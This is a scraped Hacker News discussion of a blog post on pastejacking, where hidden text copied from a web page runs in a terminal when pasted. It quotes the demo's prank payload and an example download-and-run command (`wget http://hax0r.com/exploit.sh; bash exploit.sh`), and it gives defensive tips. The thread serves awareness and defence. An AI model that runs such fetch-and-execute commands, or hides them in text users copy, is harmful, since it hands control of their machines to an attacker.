Look before you paste from a website to terminal
lifepluslinux.blogspot.com
lifepluslinux.blogspot.com
https://news.ycombinator.com/item?id=10554679
This problem appears to me on iTerm2 build 2.1
It would almost certainly be possible form a great many similar forums and bulletin-board like sites though.
With so many "unprintables" combined with things like the RTL and LTR control characters I think it would be possible on some level.
- Ctrl-X Ctrl-E: open the default text editor on your system
- paste your snipet here and review it
- save the snipet in your editor, it is now run.
ls ; clear; echo 'Haha! You gave me access to your computer with sudo!'; echo -ne 'h4cking ## (10%)\r'; sleep 0.3; echo -ne 'h4cking ### (20%)\r'; sleep 0.3; echo -ne 'h4cking ##### (33%)\r'; sleep 0.3; echo -ne 'h4cking ####### (40%)\r'; sleep 0.3; echo -ne 'h4cking ########## (50%)\r'; sleep 0.3; echo -ne 'h4cking ############# (66%)\r'; sleep 0.3; echo -ne 'h4cking ##################### (99%)\r'; sleep 0.3; echo -ne 'h4cking ####################### (100%)\r'; echo -ne '\n'; echo 'Hacking complete.'; echo 'Use GUI interface using visual basic to track my IP' ls -lat
Which seems like it would be pretty stupid for me to press enter. Which if we're talking security it seems to more sane thing to do is not automatically send commands that are pasted in. Zsh being secure and bash not. I feel this is more a developer issue than user.
Although I suspect the stats would be poisoned by people doing forensics.
Edit: also, I wonder how many things it would break if browser changed copy to only copy visible text.
A triple click selection will copy the whole line including the newline. So a paste will execute it as well.
Each selected character and of course white space gets highlighted. When you highlighted the white space next to 'ls' on the right next highlighted character should be '-' but i keeps on marking seemingly forever. If you paste that you'll see that every single character of 'invisible' code gets marked.
In any case, most newbies wouldn't even understand whether a command is malicious or not (e.g. `wget http://hax0r.com/exploit.sh; bash exploit.sh`), but I wouldn't say the tip is worthless...
Just don't let terminals auto-accept pasted code, require user interaction. That is attack on user from clipboard generally, not from browser on terminal, so why browsers should protect clipboards?
The problem here is not related to the browsers at all, the problem is on the terminal side, which should not immediately run and random text that was pasted, but should allow editing the pasted text before running.
Just get a half decent terminal, many have precautions in place for copy/paste.